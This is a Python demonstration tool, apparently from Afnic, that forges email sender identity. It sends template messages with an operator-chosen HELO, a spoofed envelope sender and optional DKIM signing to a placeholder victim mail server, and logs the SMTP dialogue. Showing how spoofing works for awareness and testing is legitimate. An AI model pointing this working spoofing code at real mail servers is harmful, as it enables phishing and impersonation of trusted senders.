#!/usr/bin/env python3
#
# SPDX-FileCopyrightText: 2023 Afnic
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
"""E-mail sender spoofing demonstration tool.

The script picks a message template from ``spoof_templates``, lets the
operator choose the HELO name and the envelope sender, optionally adds a
DKIM signature, and submits the message to ``VICTIM_MX`` while recording
the SMTP dialogue.

Two modes are available:

* interactive (default): prompts on the terminal and prints the dialogue;
* ``--non-interactive``: driven by command-line options, prints JSON.
"""

from argparse import ArgumentParser
from email.message import EmailMessage
import email.utils
import importlib.resources
import json
import pathlib
import re
import smtplib
import sys
import uuid

import dkim
from rich.console import Console
import rich.highlighter
import rich.panel
from rich.prompt import Confirm, Prompt
import rich.text
from rich.theme import Theme

import spoof_templates

DEFAULT_HELO = "attaquant.example"
ATTACKER_DOMAIN = "attaquant.example"
ATTACKER_MAIL_FROM = "usurpateur@attaquant.example"
VICTIM_NAME = "Destinataire"
VICTIM_DOMAIN = "destinataire.example"
VICTIM_MX = "mx.destinataire.example"
VICTIM_ADDRESS = f"destinataire@{VICTIM_DOMAIN}"


def _split_from_header(header):
    """Split a ``Display Name <address>`` header value.

    Returns:
        A ``(display_name, address)`` tuple.

    Raises:
        ValueError: if the header does not have the expected shape.
    """
    mobj = re.match(r'(.*) <(.*)>', str(header))
    if mobj is None:
        raise ValueError(f"unsupported From header: {header!r}")
    return mobj.group(1), mobj.group(2)


class SMTPHighlighter(rich.highlighter.Highlighter):
    """Stylize the interesting part of an SMTP command line.

    ``state`` selects which pattern applies; every *named group* of the
    matching pattern is stylized with the theme style of the same name, so
    group names must be style names declared in ``custom_theme``.
    """

    patterns = {
        'helo': r'(?:HELO|EHLO) (?P<helo>.*)',
        'mail_from': r'MAIL FROM:<(?P<mail_from>.*?)>',
        'rcpt_to': r'RCPT TO:<(?P<rcpt_to>.*)>',
        'data': r'From: (?P<data_display_name>.* <(?P<data_from>.*)>)',
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # No pattern is registered for 'connect', so nothing is highlighted
        # until one of the SMTP verbs changes the state.
        self.state = 'connect'

    def highlight(self, text):
        """Apply the style of each matched named group to *text* in place."""
        pattern = SMTPHighlighter.patterns.get(self.state)
        if pattern is None:
            return
        mobj = re.match(pattern, text.plain)
        if mobj is None:
            return
        for style in mobj.groupdict():
            start, end = mobj.span(style)
            text.stylize(style, start, end)


custom_theme = Theme({
    "banner": "bold red",
    "incoming": "yellow",
    "outgoing": "cyan",
    "helo": "bold sea_green1",
    "mail_from": "bold underline sky_blue1",
    "rcpt_to": "bold underline pale_violet_red1",
    "data_from": "bold underline medium_purple1",
    "data_display_name": "medium_purple1",
    "comment": "#777777",
    "failure": "bold red",
    "success": "green",
    "text": "default",
})

console = Console(highlighter=None, theme=custom_theme)


class SMTP(smtplib.SMTP):
    """``smtplib.SMTP`` client that records (and optionally prints) the dialogue.

    Attributes set by ``__init__``:
        highlighter: ``SMTPHighlighter`` whose state follows the SMTP verbs.
        log: list of ``{'direction': ..., 'lines': [...]}`` entries.
        output: when truthy, the dialogue is also printed on ``console``.
    """

    def __init__(self, output, **kwargs):
        # Set our own attributes first: when ``host`` is given, the parent
        # constructor connects immediately and ends up in connect()/trace(),
        # which need them.
        self.highlighter = SMTPHighlighter()
        self.log = []
        self.output = output
        super().__init__(**kwargs)

    def trace(self, s, direction):
        """Record one protocol exchange and print it when output is enabled.

        Args:
            s: the text sent or received (``str`` or UTF-8 ``bytes``).
            direction: ``'in'`` (from the server) or ``'out'`` (to the server).

        Raises:
            ValueError: if *direction* is neither ``'in'`` nor ``'out'``.
        """
        if direction not in ('in', 'out'):
            raise ValueError("direction must be 'in' or 'out'")
        arrows = {'in': '[incoming]←[/]', 'out': '[outgoing]→[/]'}
        max_lines = 4
        if isinstance(s, bytes):
            s = s.decode('utf-8')
        # NOTE: the highlighter is not applied to these lines yet; entries
        # are kept as plain dicts so the log stays JSON-serializable.
        lines = [{'class': 'text', 'text': text} for text in s.splitlines()]
        # Keep the first ``max_lines`` lines and the last one; only truncate
        # when at least one line is actually left out.
        suppressed_count = len(lines[max_lines:-1])
        if suppressed_count > 0:
            if suppressed_count > 1:
                suppressed_text = f"{suppressed_count} lignes omises"
            else:
                suppressed_text = f"{suppressed_count} ligne omise"
            suppressed_obj = {'class': 'comment', 'text': suppressed_text}
            lines = lines[:max_lines] + [suppressed_obj] + lines[-1:]
        # Print the text on the console
        if self.output:
            for i, line in enumerate(lines):
                prefix = arrows[direction] if i == 0 else " "
                console.print(f" {prefix} ", end=None)
                # Protocol text is data, not markup: square brackets coming
                # from the server or the message must be printed verbatim.
                console.print(line['text'], style=line['class'], markup=False)
            if direction == 'in':
                console.print()
        # Save it internally too
        self.log.append({'direction': direction, 'lines': lines})

    def putcmd(self, cmd, args=''):
        """Send *cmd* in upper case."""
        super().putcmd(cmd.upper(), args)

    def send(self, s):
        """Trace the outgoing data, then send it."""
        self.trace(s, 'out')
        super().send(s)

    def getreply(self):
        """Read a server reply, trace it in wire format, and return it."""
        errcode, errmsg = super().getreply()
        # Never let an 8-bit reply break tracing; a reply without text is
        # still traced as a bare status line.
        texts = errmsg.decode('us-ascii', errors='replace').splitlines() or ['']
        last = len(texts) - 1
        lines = [
            f"{errcode}{' ' if i == last else '-'}{text}"
            for i, text in enumerate(texts)
        ]
        self.trace('\n'.join(lines), 'in')
        return errcode, errmsg

    def connect(self, *args, **kwargs):
        """Add a comment entry to the log, then connect."""
        self.log.append({
            'direction': 'comment',
            'lines': [{'class': 'comment',
                       'text': 'Connexion établie au serveur'}],
        })
        return super().connect(*args, **kwargs)

    def ehlo(self, *args, **kwargs):
        self.highlighter.state = 'helo'
        return super().ehlo(*args, **kwargs)

    def mail(self, *args, **kwargs):
        self.highlighter.state = 'mail_from'
        return super().mail(*args, **kwargs)

    def rcpt(self, *args, **kwargs):
        self.highlighter.state = 'rcpt_to'
        return super().rcpt(*args, **kwargs)

    def data(self, *args):
        self.highlighter.state = 'data'
        return super().data(*args)


def ask_helo():
    """Prompt for the HELO host name (defaults to ``DEFAULT_HELO``)."""
    return Prompt.ask("Nom d’hôte dans le [helo]HELO[/helo]",
                      console=console, default=DEFAULT_HELO)


def ask_mail_from(default_mail_from):
    """Prompt for the envelope sender and return the chosen address.

    Choice 1 reuses *default_mail_from*; choice 2 uses
    ``ATTACKER_MAIL_FROM``. The question is repeated until the answer is
    one of the listed numbers.
    """
    console.print("Adresse RFC5321.MailFrom :")
    console.print(f" 1. Utiliser le même que le RFC5322.From ([b]{default_mail_from}[/])")
    console.print(f" 2. Remplacer par une adresse qu’on maîtrise ([b]{ATTACKER_MAIL_FROM}[/])")
    console.print()
    choices = {
        1: default_mail_from,
        2: ATTACKER_MAIL_FROM,
    }
    while True:
        response = Prompt.ask("Choix", console=console)
        try:
            result = choices[int(response)]
        except (ValueError, KeyError):
            # Not a number, or a number that is not on the menu: ask again.
            continue
        console.print(f" ⇒ [mail_from]{result}[/]")
        return result


def add_dkim_signature(email):
    """Optionally add a ``DKIM-Signature`` header to *email*.

    When the operator accepts, the private key is read from
    ``<selector>.private`` in the current directory. The message is
    modified in place and returned.
    """
    # ``choices`` must be a list: with the string "on", rich's membership
    # test would also let the literal answer "on" through.
    if Confirm.ask("Ajouter une signature DKIM ?", console=console,
                   choices=["o", "n"], default=False):
        email_bytes = email.as_string().encode('utf-8')
        selector = Prompt.ask("Sélecteur", console=console)
        private_key = pathlib.Path(f"{selector}.private").read_bytes()
        selector = selector.encode('ascii')
        domain = Prompt.ask("Domaine", console=console,
                            default=ATTACKER_DOMAIN).encode('ascii')
        signature_line = dkim.dkim_sign(
            email_bytes, selector, domain, private_key).decode('ascii')
        # Drop the header name and the trailing CRLF, keep the value.
        signature = re.match("^DKIM-Signature: (.*)\r\n", signature_line,
                             re.DOTALL).group(1)
        console.print(" ⇒ Signature DKIM ajoutée")
        email['DKIM-Signature'] = signature
    else:
        console.print(" ⇒ Pas de signature DKIM")
    return email


def generate_email(template):
    """Complete the template's message with To, Date and Message-ID headers.

    ``template.msg`` itself is modified and returned. A ``Content-Type``
    header is added only when the message has none.
    """
    msg = template.msg
    msg['To'] = f"{VICTIM_NAME} <{VICTIM_ADDRESS}>"
    msg['Date'] = email.utils.formatdate()
    msg['Message-ID'] = f"{uuid.uuid4()}@{DEFAULT_HELO}"
    if not msg['Content-Type']:
        msg['Content-Type'] = "text/plain; charset=utf-8"
    return msg


def ask_template():
    """List the available templates and return the one the operator picks.

    The question is repeated until the answer is a number between 1 and
    the number of templates.
    """
    templates = spoof_templates.spoof_templates()
    console.print("[bold]Sélectionner un scénario :[/]")
    for i, template in enumerate(templates):
        console.print(f"{i + 1:4}. {template.nice_name}")
    console.print()
    while True:
        response = Prompt.ask("Choix", console=console)
        try:
            index = int(response)
        except ValueError:
            continue
        # Reject 0 and negative numbers explicitly: Python would otherwise
        # accept them as indices counted from the end of the list.
        if not 1 <= index <= len(templates):
            continue
        result = templates[index - 1]
        console.print(f" ⇒ [bold]{result.nice_name}[/]")
        console.print()
        return result


def send_email(helo, envelope_from, email, output=True):
    """Submit *email* to ``VICTIM_MX`` for ``VICTIM_ADDRESS``.

    Args:
        helo: host name announced in HELO/EHLO.
        envelope_from: address used in ``MAIL FROM``.
        email: message object providing ``as_string()``.
        output: when true, print the SMTP dialogue on the console.

    Returns:
        ``{'outcome': 'success' | 'failure', 'log': [...]}``. ``'failure'``
        means an ``smtplib.SMTPException`` was raised; any other exception
        propagates to the caller.
    """
    data = email.as_string().encode('utf-8')
    with SMTP(local_hostname=helo, output=output) as smtp:
        try:
            smtp.connect(VICTIM_MX)
            smtp.sendmail(envelope_from, VICTIM_ADDRESS, data)
        except smtplib.SMTPException:
            return {'outcome': 'failure', 'log': smtp.log}
        return {'outcome': 'success', 'log': smtp.log}


def interactive_main():
    """Run the interactive scenario; Ctrl-C ends it quietly."""
    try:
        console.print(
            rich.panel.Panel(
                "🕱 Outil d’usurpation d’identité de courriel 🕱",
                style="banner", width=80))
        console.print()
        template = ask_template()
        display_name, rfc5322from = _split_from_header(template.msg['From'])
        console.print("Adresse RFC5322.From (tirée du scénario):")
        console.print(f" ⇒ [data_display_name]{display_name} <[data_from]{rfc5322from}[/data_from]>[/]")
        console.print()
        envelope_from = ask_mail_from(rfc5322from)
        console.print()
        helo = ask_helo()
        console.print()
        email = generate_email(template)
        signed_email = add_dkim_signature(email)
        results = send_email(helo, envelope_from, signed_email, output=True)
        if results['outcome'] == 'success':
            console.print(" [success]✔[/] Message [success]accepté[/] par le serveur SMTP")
        elif results['outcome'] == 'failure':
            console.print(" [failure]✘[/] Message [failure]rejeté[/] par le serveur SMTP")
    except KeyboardInterrupt:
        console.print()


def main():
    """Command-line entry point.

    Without ``--non-interactive`` the interactive scenario runs. With it,
    ``--get-config`` prints the available templates as JSON; otherwise the
    template named by ``--template`` is sent and the result is printed as
    JSON.
    """
    parser = ArgumentParser()
    parser.add_argument('--non-interactive', default=False, action='store_true')
    parser.add_argument('--get-config', default=False, action='store_true')
    parser.add_argument('--template')
    parser.add_argument('--replace-rfc5321-mail-from', default=False, action='store_true')
    parser.add_argument('--helo', default=DEFAULT_HELO)
    args = parser.parse_args()

    if not args.non_interactive:
        interactive_main()
        return

    if args.get_config:
        template_configs = []
        for t in spoof_templates.spoof_templates():
            from_name, from_address = _split_from_header(t.msg['From'])
            template_configs.append({
                'id': t.name,
                'name': t.nice_name,
                'from_name': from_name,
                'from_address': from_address,
            })
        config = {
            'default_helo': DEFAULT_HELO,
            'my_mail_from': ATTACKER_MAIL_FROM,
            'templates': template_configs,
        }
        print(json.dumps(config))
        return

    templates = {t.name: t for t in spoof_templates.spoof_templates()}
    template = templates.get(args.template)
    if template is None:
        # Report a usage error instead of a KeyError traceback.
        known = ', '.join(str(name) for name in templates)
        parser.error(f"unknown template {args.template!r} (available: {known})")
    _, rfc5322from = _split_from_header(template.msg['From'])
    if args.replace_rfc5321_mail_from:
        envelope_from = ATTACKER_MAIL_FROM
    else:
        envelope_from = rfc5322from
    email = generate_email(template)
    results = send_email(args.helo, envelope_from, email, output=False)
    print(json.dumps(results))


if __name__ == '__main__':
    main()